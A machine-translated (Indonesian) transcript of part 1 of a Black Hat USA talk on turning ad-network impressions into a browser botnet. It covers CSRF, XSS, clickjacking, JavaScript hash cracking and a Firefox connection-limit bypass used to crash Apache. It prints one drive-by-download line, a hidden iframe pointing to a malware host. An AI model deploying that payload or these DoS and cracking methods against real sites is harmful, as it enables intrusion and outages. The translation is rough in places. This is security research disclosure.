Konferensi BLACK HAT USA. Botnet dari sejuta browser. Bagian 1

Jeremy Grossman: Saya senang menyambut Anda semua dan saya ingin mengatakan bahwa kami telah mempersiapkan presentasi ini selama 6 bulan penuh, jadi kami berusaha untuk berbagi prestasi kami sesegera mungkin. Saya ingin mengucapkan terima kasih kepada seluruh staf Black Hat atas undangannya, kami kembali ke sini setiap tahun, kami menyukai acara ini. Terima kasih atas Topi Hitam! Kami akan mencoba membuat presentasi hari ini menyenangkan, tetapi pertama-tama kami ingin memperkenalkan diri kami.



Saya adalah pendiri dan manajer pengembangan produk baru untuk WhiteHat Security, yang berlokasi di Santa Clara, California. Perusahaan kami memiliki sekitar 300 karyawan.

Matt adalah direktur pelaksana pusat riset risiko keamanan. Di "berkepala putih" kami terutama terlibat dalam membobol situs web, menemukan kerentanan di dalamnya dan melakukan ini dalam skala besar. Tetapi kami masih memiliki waktu untuk penelitian, jadi hari ini kami akan mulai meretas peramban dan menggunakannya untuk meretas situs dan menunjukkan kepada Anda siklus penuh keamanan web. Saya pertama kali berbicara di sini pada tahun 2002. Sebagian besar waktu saya melakukan penelitian dalam pengembangan dan penyajian produk kami.

Matt Johansson: Saya memiliki pengalaman bekerja sebagai penguji penetrasi (pentester), dan saya memulai pekerjaan saya di perusahaan dengan situs peretasan, karena sebelumnya saya sendiri memimpin pasukan peretas. Saya melakukan riset keren dan mengambil banyak untuk itu, sehingga Anda dapat menghubungi saya.



Jeremy Grossman: Jadi, mari kita mulai pesta kami. Saya tidak berpikir bahwa setidaknya ada satu orang yang tidak mengakses Internet saat ini. Mungkin sekarang Anda tidak terhubung ke Internet, tetapi ketika Anda sampai di rumah, semua orang yang hadir di sini dan semua orang yang Anda kenal akan berinteraksi dengannya menggunakan browser. Ini hanya bagian dari kehidupan kita sehari-hari, dan saya akan menjelaskan kepada Anda apa artinya ini, tetapi Internet terutama dirancang untuk bekerja. Kami tidak meretas Internet, kami mencoba menggunakannya untuk tujuan kami sendiri.

Saat Anda mengunjungi halaman web, tidak masalah browser yang Anda gunakan - Chrome, Firefox, Safari, IE atau Opera, dalam hal apa pun, Internet berfungsi sedemikian rupa sehingga sepenuhnya mengontrol browser Anda saat Anda berada di halaman ini atau ketika Anda mencari yang berikutnya halaman.

JavaScript atau flash pada halaman ini dapat menyebabkan browser melakukan apa saja - semua jenis respons terhadap permintaan ke mana saja di Internet atau intranet. Ini termasuk CSRF - permintaan lintas situs palsu, XSS - skrip lintas situs, clickjacking dan banyak trik lain yang memungkinkan Anda untuk mendapatkan kendali atas browser.

Sekarang kita akan mencoba untuk mendapatkan pemahaman tentang apa itu keamanan browser, tetapi ide utamanya adalah untuk mendapatkan ide umum tentang kontrol browser tanpa menggunakan eksploitasi zero-day, yang tidak ada tambalan.

Matt Johanson: Jika Anda tidak tahu apa-apa tentang XSS, Anda dapat bertanya kepada kami tentang hal itu.

Jeremy Grossman: Sekarang saya ingin berbicara singkat tentang serangan browser yang menggunakan HTML atau JavaScript berbahaya:

  • Browser Interogasi polling browser
  • permintaan lintas situs palsu; Login Login deteksi masuk; deanonimisasi;
    Meretas intranet
    Script lintas situs otomatis
    malware tradisional memasuki komputer pengguna saat mengunduh menggunakan metode Drive-by-Download;
    hash brute force cracking;
    Serangan DDoS di tingkat aplikasi.




    Pada slide ini, Anda melihat contoh Interogasi Browser - hanya JavaScript yang tetap berada di browser saat Anda pergi ke situs lain. Ini adalah tangkapan layar dari CNN. Saat Anda mengunjungi situs mereka, metrik di sana terhubung ke browser Anda, yang melakukan survei lengkap dan menerima sejumlah besar informasi tentang tampilan Anda: browser apa yang Anda miliki, versi apa, plugin mana yang terhubung, OS apa yang Anda miliki. Mereka melakukan ini karena mereka ingin tahu siapa yang mengunjungi situs mereka. Saat ini, ini adalah teknologi yang sangat umum.

    Selanjutnya, pertimbangkan teknologi yang lebih maju - pemalsuan JavaScript lintas situs. Itu tidak memerlukan banyak usaha, Anda tidak perlu menjalankan skrip berbahaya, cukup browser Anda dengan JavaScript atau HTML yang digunakan untuk meretas ke situs lain mana pun. CSRF menggunakan riwayat pencarian Google Anda dan memaksa browser Anda untuk mengunggah atau mengunduh konten ilegal, melakukan transfer bank, jika Anda masuk ke akun pribadi Anda di situs web bank, itu akan memaksa Anda untuk mengirim pesan kasar atau memilih Ed Snowden sebagai Person of the Year.

    Matt Johanson: CSRF dapat memaksa Anda untuk tidak hanya mengunduh lagu-lagu Justin Bieber, tetapi juga mengunduh pornografi anak-anak.

    Jeremy Grossman: jadi, baris pertama pada slide memaksa browser Anda untuk menyuntikkan konten berbahaya ke situs lain, yaitu, itu bisa membuat Anda seorang peretas, yang kedua memaksa Anda untuk mengunduh torrent dan menjadikan Anda bajak laut yang melanggar semua jenis lisensi DMCA, yang ketiga mengirimkannya ke klub penggemar Justin Bieber, suara keempat di beberapa situs.



    Berikut ini adalah pengakuan dari login Deteksi Login - ini adalah saat Anda membuka situs yang kami kontrol. Kami dapat mengetahui bahwa Anda masuk ke akun Anda di Google, Facebook, Twitter, Linkedin. Ada 6 teknologi berbeda untuk mengekstraksi data otorisasi dari browser Anda. Kami mempelajari preferensi Anda dan melakukan serangan bertarget pada pengguna tertentu.



    Serangan lain adalah clickjacking, memungkinkan Anda untuk mengungkapkan data Anda segera setelah Anda mengklik gambar atau tombol apa pun. Katakanlah Anda masuk ke Twitter atau Facebook dan menyukai gambar kucing menari. Anda mengklik sesuatu yang tidak berbahaya, tetapi pada kenyataannya Anda mengklik salah satu tombol ini dan mengungkapkan data Anda. Hanya satu klik - dan kami tahu nama Anda, lokasi, kami tahu data yang Anda posting di profil Anda di Twitter atau LinkedIn.



    Matt Johanson: Beberapa perusahaan terlibat dalam pelacakan seperti itu, karena nama lengkap Anda dapat sangat bermanfaat bagi mereka untuk iklan yang ditargetkan untuk barang atau jasa mereka.

    Jeremy Grossman: Sejauh ini kita telah membahas hal-hal yang terkenal, setidaknya diketahui oleh para penonton Black Hat. Anda juga sadar akan melanggar intranet dengan menyuntikkan JavaScript berbahaya melalui HTTP ke router DSL Anda yang menyediakan konektivitas jaringan.



    Ini pertama kali ditemukan pada 2006 dan sejauh ini kerentanannya belum diperbaiki. Selanjutnya, kami memiliki jenis serangan "skrip lintas situs otomatis", ketika menggunakan iframe, injeksi kode XSS berbahaya dilakukan, yang memungkinkan Anda untuk mencuri cookie Anda, kata sandi yang disimpan, dan sebagainya. Ini terutama dilakukan melalui portal penyedia email.



    Terakhir, Anda dapat mengunduh malware tradisional menggunakan metode Drive-by-Downloads dengan menyuntikkan baris berikut:

    <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe> 

    Akibatnya, browser Anda dikirim ke situs yang terinfeksi untuk mengunduh konten berbahaya, yang kemudian mengendalikan komputer Anda. Di sini, objek serangan mungkin browser itu sendiri atau ekstensi, terutama serangan ini digunakan untuk membuat jaringan botnet, dan untuk menghindari ancaman ini, Anda perlu menginstal tambalan tepat waktu, dan lebih baik untuk menghapus Jawa sama sekali. Secara singkat, ini adalah metode serangan yang akan kita fokuskan dalam pembicaraan ini.

    Matt Johansson: Jeremy berbicara tentang hal-hal yang telah disebutkan di konferensi BlackHat sebelumnya. Saya ingin berbicara tentang studi lain yang berfokus pada komputasi terdistribusi menggunakan JavaScript untuk memecahkan kata sandi. Ini adalah hal yang keren, karena Anda bisa menulisnya dan bekerja sangat cepat. Penelitian Lavakumar Kuppan menunjukkan bahwa dengan metrik yang ia temukan, Anda benar-benar dapat meretas atau mencoba memecahkan seratus ribu hash MD5 per detik menggunakan JavaScript jika Anda dapat mendistribusikan JavaScript ini.

    Slide berikut menunjukkan cara kerja sistem komputasi terdistribusi Ravan berbasis JavaScript, yang dapat menyerang hash di beberapa browser menggunakan serangan brute force.

    Ini menggunakan HTML5 untuk menjalankan JavaScript di latar belakang WebWorkers, termasuk banyak komputer di mana browser terbuka dalam jaringan menebak kata sandi tunggal. Dia menemukan kata sandi pengguna yang cocok dengan hash tertentu, mengurutkan dari 60 hingga 70 ribu kata sandi per detik, 12 WebWorkers digunakan untuk ini.



    Ini adalah hal yang sangat cepat, nanti kita akan fokus pada bagaimana itu didistribusikan. Selain masalah ini, kami telah meneliti aplikasi yang menyebabkan kegagalan layanan (DoS) selama beberapa bulan. Browser dapat mengirim sejumlah besar permintaan GET ke situs jarak jauh menggunakan COR dari WebWorkers. Selama penelitian, ditemukan bahwa sekitar 10.000 permintaan per menit dapat dikirim dari satu browser. Pada saat yang sama, browser tidak membiarkan banyak koneksi TCP terbuka, itu hanya secara bersamaan meluncurkan banyak permintaan HTTP. Anda dapat menggunakan satu browser dan beberapa browser yang ditujukan untuk satu situs. Tetapi kapan saja Anda dapat meningkatkan intensitas serangan dengan meningkatkan jumlah koneksi.

    Jeremy Grossman: Saya akan berbicara tentang batasan browser pada koneksi.



    Alat yang disebut Browserscope menunjukkan berapa banyak koneksi yang dapat didukung oleh browser tertentu atau versi browser tertentu pada suatu waktu. Semua browser mendukung tidak lebih dari 6 koneksi dengan nama host yang sama, dan jumlah koneksi maksimum, misalnya, di IE versi 8 dan 9 mencapai 35. Setiap browser memiliki batasan pada jumlah koneksi, bukan untuk keamanan, tetapi untuk stabilitas dan kinerja, karena Anda pergi ke situs , kirim permintaan, dan browser Anda mulai mengunduh konten.

    Kami memeriksa indikator ini dan kami dapat mengatakan bahwa sebagian besar browser benar-benar memberikan kerja dengan 6, dengan maksimum 7 koneksi. Slide berikut ini menunjukkan operasi Browserscope, yang menguji kinerja berbagai browser, menciptakan banyak koneksi simultan ke server. Dalam hal ini, ada enam koneksi stabil untuk Firefox.

    Namun, beberapa browser memungkinkan Anda untuk menghindari batasan ini, dan dalam pengujian kami, kami menggunakan Firefox untuk menyebabkan kegagalan layanan. Slide berikutnya menunjukkan skrip Apache Killer, yang membantu memintas pembatasan browser, membuat seluruh aliran permintaan simultan ke server dan meningkatkan jumlah koneksi terbuka secara bersamaan dari 6 menjadi 300.



    Protokol HTTP digunakan di sini, tetapi jika Anda menggunakan FTP over port 80, jumlah koneksi meningkat menjadi 400, dan ini benar-benar dapat "membunuh" server Apache.

    Matt Johanson: Perbedaan penting di sini adalah bahwa kami melakukan ini menggunakan FTP, yang tidak dapat menggunakan protokol HTTP. Karena itu, kami tidak dapat memeriksa banyak posisi dari daftar teratas dan tidak dapat menjalankan banyak aplikasi CSR. Ini hanya koneksi yang kami coba buka pada saat yang sama, jadi ini bukan serangan DoS yang sangat tradisional, ketika seorang penyerang mencoba meluncurkan sebanyak mungkin megabit atau gigabit per detik atau per jam, ini hanya jumlah koneksi terbuka yang diizinkan pada saat yang sama.

    Jeremy Grossman: sekarang saya akan menjalankan server Apache di laptop saya, ini adalah versi sederhana "vanilla" dari Apache 2.4.4, di mana semua pengaturan dasar diatur secara default dan tidak dapat memiliki dampak yang signifikan.



    Kita akan fokus pada siklus pertama, saya akan menginstal sejumlah permintaan gambar ke server di sini, Anda melihat bagaimana permintaan dikirim, dan server tidak merespons selama 3 detik, dan kemudian gambar mulai memuat secara seri.

    Matt Johanson: Ini adalah aspek kinerja browser, bukan aspek keamanan. Kami mungkin dapat menyalahgunakannya dengan merugikan keamanan, Anda akan melihatnya dalam beberapa menit. Tetapi intinya dari tindakan ini adalah mengunduh semua gambar ini sekaligus.

    Jeremy Grossman: Saya lupa menyebutkan status server, di layar kiri bawah Anda melihat bahwa status menunjukkan 7 koneksi terbuka secara bersamaan, satu untuk jendela browser dan 6 lainnya untuk 6 gambar yang diunggah. Ini sangat penting, karena sekarang kami mencoba untuk menembus batas atas koneksi di browser khusus ini. Sekarang saya akan mengatur nilai koneksi ke 0 untuk mematikan koneksi ini, dan menunjukkan cara untuk memotong batasan di Firefox.

    Kami cukup memutarkan ini hingga 100 koneksi menggunakan FTP untuk nama host yang sama. Mereka semua tidak memerlukan URL, karena itu adalah FTP, tidak mengirim HTTP. Lihat di sudut kiri bawah - status server telah berubah, ini menunjukkan 100 koneksi, 100 halaman untuk dilihat. Sekarang mari kita beralih ke 400 koneksi.

    Halaman diperbarui setiap detik, dan ketika jumlah koneksi mencapai 270, server menderita "panik" sehingga tidak punya waktu untuk melayani lebih banyak permintaan. Yang kami lakukan hanyalah mengunggah kode ini ke halaman web, dan Apache mencoba membawa jumlah koneksi terbuka simultan menjadi 300. Dan kami melakukan semua ini dengan satu browser.

    Di belakang latar belakang Anda melihat pengguliran lain, kami memiliki sistem lain di Amazon, ini adalah sistem AWS. Saya tidak ingin membunuhnya dengan serangan DoS sekarang, jadi saya menawarkan opsi demonstrasi lain kepada Anda.
    Matt Johansson: Sekarang kita tahu apa yang bisa kita lakukan, setidaknya dengan Firefox. Ini bukan serangan penolakan layanan tradisional dan botnet tidak digunakan di sini. Kami masih memiliki beberapa kemungkinan lagi, tetapi secara umum, keuntungan peretasan dengan metode serangan ini adalah sebagai berikut:

    • tidak ada malware, tidak ada eksploitasi atau serangan zero-day diperlukan;
    • tidak ada jejak, tidak ada kecemasan, larangan caching browser;
    • secara default, browser apa pun rentan terhadap serangan ini;
    • sangat mudah diterapkan, Anda sendiri melihat betapa sederhananya kode tersebut;
    • seperti yang kita katakan - ini bekerja seperti seharusnya. Internet berpotensi dirancang untuk berfungsi dengan cara ini, yaitu, ia harus memastikan bahwa banyak gambar diunduh secepat mungkin.

    Karena itu, saya tidak tahu siapa yang bisa memperbaiki masalah ini. Mari kita fokus pada masalah penyebaran metode serangan ini menggunakan kode JavaScript berbahaya. Kami tidak akan mempertimbangkan cara klasik spammer menggunakannya, seperti mengirim email. Pertimbangkan distribusi oleh pengguna biasa, mis. Penskalaan dari sudut pandang pengguna biasa:

    • penggunaan situs dengan lalu lintas signifikan yang Anda miliki (blog, perangkat lunak, dll.);
    • Suntikan HTML di situs, forum, dll. Populer
    • metode โ€œman in the middleโ€ melalui router Wi-Fi;
    • "Keracunan" mesin pencari;
    • situs peretasan dengan injeksi massal cacing SQL;
    • widget pihak ketiga (cuaca, penghitung, pelacak, dll.).

    Douglas Crockford berkata: "Cara yang paling dapat diandalkan dan paling hemat biaya untuk menyuntikkan kode berbahaya adalah dengan membeli iklan." Oleh karena itu, kami akan mempertimbangkan cara kerja jaringan iklan, karena ada banyak dari mereka di Internet. Slide berikutnya menunjukkan ekosistem periklanan yang khas.



    Jadi, di bagian atas Anda melihat bahwa pengiklan pertama-tama harus menunjukkan sesuatu kepada Anda, misalnya buket bunga untuk kencan. Mereka menghabiskan uang untuk itu, tetapi mereka membutuhkan situs untuk membawa barang-barang mereka ke konsumen akhir. Mereka ingin tetap di tangan mereka sebagai distributor massal - penerbit informasi seperti blog, berita, jejaring sosial, ulasan, situs populer yang dikunjungi oleh banyak pengguna. Ada jembatan antara pengiklan dan penerbit yang disebut Advertising Networks. Mereka menghabiskan uang untuk memposting informasi mereka di jaringan ini, bisa berupa gambar, spanduk pop-up, JavaScript - apa pun yang Anda ingin melihatnya. Anda adalah sosok biru kecil di bagian bawah slide.

    Matt Johansson: Pagi ini kami pergi ke situs web TMZ dan mengambil tangkapan layar yang menakjubkan di sana.



    Anda melihat unit iklan di bagian paling atas halaman dan di kanan bawah.

    Jeremy Grossman: Semua unit iklan yang Anda lihat adalah kode JavaScript yang terletak tepat di depan pengguna situs web TMZ dan berfungsi untuk menarik perhatian mereka agar mendapat uang. Ada puluhan dan ratusan jaringan iklan seperti itu, tetapi perlu diingat bahwa gambar logo perusahaan kami di sudut kanan atas slide bukanlah jaringan iklan! Beberapa jaringan ini menggunakan JavaScript, beberapa tidak.

    Jadi, saya menulis surat kepada pemilik satu jaringan periklanan tentang apa yang saya ingin tempatkan JavaScript periklanan pihak ketiga dalam sistem mereka. Salah satu dari mereka menjawab saya dengan sangat cepat, secara harfiah dalam beberapa menit. Dia menulis bahwa mereka hanya mengizinkan kode seperti itu untuk diposting dari perusahaan besar dan terkenal seperti DoubleClick, yang mereka percayai dan yang memindai di pihak mereka semua bahan untuk kerentanan potensial. Dan jika saya bekerja dengan server iklan pihak ketiga yang besar seperti DFA dan sejenisnya, maka mereka akan menemukan kesempatan untuk meng-host JavaScript saya.



    Semua jaringan periklanan tradisional berperilaku seperti ini - Anda membayar mereka, mendapatkan beberapa metrik dan mereka menempatkan iklan Anda. Ada jenis jaringan lain yang kami temui. Kami sengaja tidak memberi Anda nama mereka, karena kami tidak tahu apakah kami akan mendapat masalah karena ini.



    Sistem ini bekerja dengan cara ini - Anda membayar sedikit uang untuk seseorang yang duduk di rumah di depan komputer di malam hari untuk melihat halaman Anda melalui browser mereka untuk jangka waktu tertentu. Ternyata Anda membeli waktu browser seharga satu sen - dalam hal ini, 10 ribu menit menonton dapat dibeli sekitar $ 10,5.

    Matt Johansson: Keadaan penting adalah bahwa metode tampilan berbayar ini banyak digunakan untuk memecahkan kata sandi. Karena penyerang membutuhkan banyak waktu untuk memecahkan kata sandi atau login menggunakan metode brute force, dan jaringan iklan ini tidak menjamin bahwa browser Anda akan melihat iklan, tetapi tidak akan menangkap kode jahat yang dimulai segera setelah iklan dimuat di halaman. Anda membayar untuk itu, tetapi jika seseorang duduk di sana selama satu menit, 10 menit, 2 detik, tidak ada jaminan bahwa Anda tidak akan membayar kenyataan bahwa Anda dapat digunakan untuk serangan DoS.

    Jeremy Grossman: perhatikan baris terakhir - Anda dapat membeli satu juta menit menonton, ini hampir 2 tahun waktu browser, sekitar $ 650. Jadi ini metrik yang bagus!

    Sekarang Internet bekerja pada iklan, dan itu sangat berharga. Mari kita kembali ke agenda dan fokus pada dua jenis serangan terakhir - brute force hash cracking dan serangan DDoS tingkat aplikasi. Anda melihat bahwa mereka dapat dengan mudah ditingkatkan menjadi satu juta oleh browser, atau cukup membayar $ 650 dan mulai meretas kata sandi untuk waktu yang setara dengan dua tahun. Kami akan menunjukkan kepada Anda beberapa demonstrasi, tetapi pertama-tama, mari kita bicara tentang ekonomi.

    Matt Johansson: Anda melihat screenshot ini tentang pembelian menit, tetapi jaringan iklan memiliki bahasa mereka sendiri, yang tidak mudah untuk saya pelajari. Pengiklan menyebut ini "tayangan," tetapi kita berbicara tentang layanan iklan berbayar pada halaman tertentu. Selama beberapa bulan terakhir, harga telah bertahan di sekitar 50 sen per 1.000 "tayangan," atau per seribu tayangan iklan. Ada label harga BPK dan Biaya Ribu CPM.



    Karena itu, ketika saya mengatakan "kesan", Anda harus membayangkan browser sebagai bot, seolah-olah Anda menyewa satu orang untuk mengunggah iklan Anda ke browser dan mendapatkan kendali atas browser ini saat ini. Jadi, mereka menyebutnya "kesan", dan kami menyebutnya "bot".

    Jeremy Grossman: Tidak ada halangan untuk mencegah orang jahat, orang jahat sejati mencuri kartu kredit, dari dapat menggunakan kartu curian ini untuk membeli menit iklan atau "tayangan".

    Matt Johanson: Pada tangkapan layar berikut, Anda melihat statistik di jaringan iklan yang kami gunakan dalam penelitian kami.



    Kami merasa seperti berada di depan dasbor, mengeklik tombol dan mencoba membuat iklan kami muncul di jaringan ini. Kami tidak menampilkan iklan apa pun, hanya boneka palsu, dan tidak menjalankan kode JavaScript kami. Kami hanya mencoba diri kami sebagai pengiklan dan berusaha tetap tidak menarik bagi pengguna dan pemilik jaringan periklanan sebaik mungkin, sehingga mereka membiarkan kami menggunakan metode peretasan kami yang damai, memerintahkan server web kami sendiri. Selama beberapa bulan penelitian kami, kami bahkan tidak menghabiskan 10 dolar.

    Anda dapat menetapkan batas harian untuk semua jenis item iklan, Anda dapat memilih kata kunci spesifik yang harus menjadi fokus pengguna, memilih geolokasi audiens, sistem operasi atau browser yang akan ditampilkan iklan Anda, Anda dapat memfokuskan iklan pada perangkat seluler atau alat stasioner pengguna.

    Saya hanya memilih jangkauan audiens seluas mungkin, dan saya memilih kata "komputer" sebagai kata kunci. Pada hari pertama, kami hanya membeli 15 klik, biayanya $ 4, akibatnya kami menerima atau 8326 โ€œtayanganโ€. Bayangkan dengan investasi yang menguntungkan, kode Anda dapat diunduh ke 8326 browser selama 24 jam!

    Konferensi BLACK HAT USA. Botnet dari sejuta browser. Bagian 2


    Terima kasih telah tinggal bersama kami. Apakah Anda suka artikel kami? Ingin melihat materi yang lebih menarik? Dukung kami dengan melakukan pemesanan atau merekomendasikannya kepada teman-teman Anda, diskon 30% untuk pengguna Habr pada analog unik dari server entry-level yang kami buat untuk Anda: Seluruh kebenaran tentang VPS (KVM) E5-2650 v4 (6 Cores) 10GB DDR4 240GB SSD 1Gbps dari $ 20 atau bagaimana membagi server? (opsi tersedia dengan RAID1 dan RAID10, hingga 24 core dan hingga 40GB DDR4).

    VPS (KVM) E5-2650 v4 (6 Cores) 10GB DDR4 240GB SSD 1Gbps hingga Desember secara gratis ketika membayar untuk jangka waktu enam bulan, Anda dapat memesan di sini .

    Dell R730xd 2 kali lebih murah? Hanya kami yang memiliki 2 x Intel Dodeca-Core Xeon E5-2650v4 128GB DDR4 6x480GB SSD 1Gbps 100 TV dari $ 249 di Belanda dan Amerika Serikat! Baca tentang Cara Membangun Infrastruktur Bldg. kelas menggunakan server Dell R730xd E5-2650 v4 seharga 9.000 euro untuk satu sen?

Source: https://habr.com/ru/post/id426241/


All Articles